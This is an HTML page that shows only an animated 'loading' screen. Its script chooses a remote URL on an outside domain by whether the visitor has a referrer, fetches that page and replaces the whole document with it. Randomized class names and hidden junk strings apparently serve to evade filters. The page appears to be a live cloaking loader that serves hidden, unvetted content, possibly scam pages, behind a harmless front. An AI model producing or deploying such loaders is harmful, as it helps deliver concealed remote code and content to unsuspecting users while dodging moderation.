<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RCRKTmo9k1N {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RCRKTmo9k1N .yEWHkUW4i {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RCRKTmo9k1N .content {
            line-height: 50px;
            text-align: center
        }

        .RCRKTmo9k1N .img {
            width: 100%
        }

        .RCRKTmo9k1N .IoVVGkQQ9 {
            text-align: center
        }

        .RCRKTmo9k1N .IoVVGkQQ9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RCRKTmo9k1N .IoVVGkQQ9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RCRKTmo9k1N .IoVVGkQQ9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RCRKTmo9k1N .IoVVGkQQ9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RCRKTmo9k1N .IoVVGkQQ9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RCRKTmo9k1N .IoVVGkQQ9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RCRKTmo9k1N .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Zj2yqjwCvyt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MzYWx = Zj2yqjwCvyt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MzYWx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MzYWx +".html?a=share";
		}
		
        NA99Ae=url+"#"+new Date().getTime();
        NA99Ae && function() {
            $.get(NA99Ae, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>Ayv7A9LeVqAkWD3l4H9UyndnZ0hxSbYWGRSZcQ4YIN700NbGj1VWmPlSez6nazT0</a>
<img  src='' style='display:none'>
<li style='display:none' >auyc1ejgB41XLX3hnFuZMgyFMezup1DoF8IYmPVEsR7k3etmpIq0HyQxH2UJmbSh</li><div class="RCRKTmo9k1N">
    <div class="yEWHkUW4i">
        <div class="IoVVGkQQ9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >wyrr0AWx7FeTTpf2iKVx1twAoB8R3VNsQRBcOao9j5UxrsQlsWieLSRLmpYLwZqvqLGoTM9</li>
<ul style='display:none' >qe3yWt8rcc7rl9CtaeeyOZuyQp6mhS0lruseijsHrGPJKJ8EHLbr4ohl3wUPrercMfr</ul>
<ul style='display:none' >qe3yWt8rcc7rl9CtaeeyOZuyQp6mhS0lruseijsHrGPJKJ8EHLbr4ohl3wUPrercMfr</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >Gq9TwuyKCRyWFnFisuXbu1BA2PPuRJTPER0ELm</h1></body>
</html>